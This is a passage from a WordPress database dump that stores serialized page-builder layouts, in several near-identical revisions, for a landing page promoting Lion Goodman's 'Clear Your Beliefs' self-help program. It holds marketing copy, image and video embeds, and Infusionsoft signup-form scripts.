(1178, 1660, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:225:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:435:"<center style="margin-top: -108px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:728:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n<center style="margin-top: -14px;"><div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:713:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 52px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPHONE APP[/su_button]\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPAD APP[/su_button]\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:836:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website.png"></div>\n<p style="text-align: center; margin-top: 15px; font-size: 18px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<p style="text-align: center; margin-top: 15px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly, &\nLimit Your True Magnificence</center>\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1418:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h1>The <em>Clear Your Beliefs</em> Program empowers you to...</h1>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:2842:"<div id="divStroke"><p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman<br /></strong><strong>Creator of the <em>Clear Your Beliefs</em> program. </strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul><li> <em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback.  I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1179, 1661, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:225:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:435:"<center style="margin-top: -108px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:728:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n<center style="margin-top: -14px;"><div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:943:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 52px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 64px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:841:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website.png"></div>\n<p style="text-align: center; margin-top: 15px; font-size: 18px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<p style="text-align: center; margin-top: 15px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly, &#038;\nLimit Your True Magnificence</center>\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1418:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h1>The <em>Clear Your Beliefs</em> Program empowers you to...</h1>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:2842:"<div id="divStroke"><p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman<br /></strong><strong>Creator of the <em>Clear Your Beliefs</em> program. </strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul><li> <em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback.  I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1180, 1662, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:225:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:435:"<center style="margin-top: -108px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:728:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n<center style="margin-top: -14px;"><div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:946:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 32px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 54px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:841:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website.png"></div>\n<p style="text-align: center; margin-top: 15px; font-size: 18px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<p style="text-align: center; margin-top: 15px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly, &#038;\nLimit Your True Magnificence</center>\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1418:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h1>The <em>Clear Your Beliefs</em> Program empowers you to...</h1>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:2842:"<div id="divStroke"><p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman<br /></strong><strong>Creator of the <em>Clear Your Beliefs</em> program. </strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul><li> <em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback.  I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion 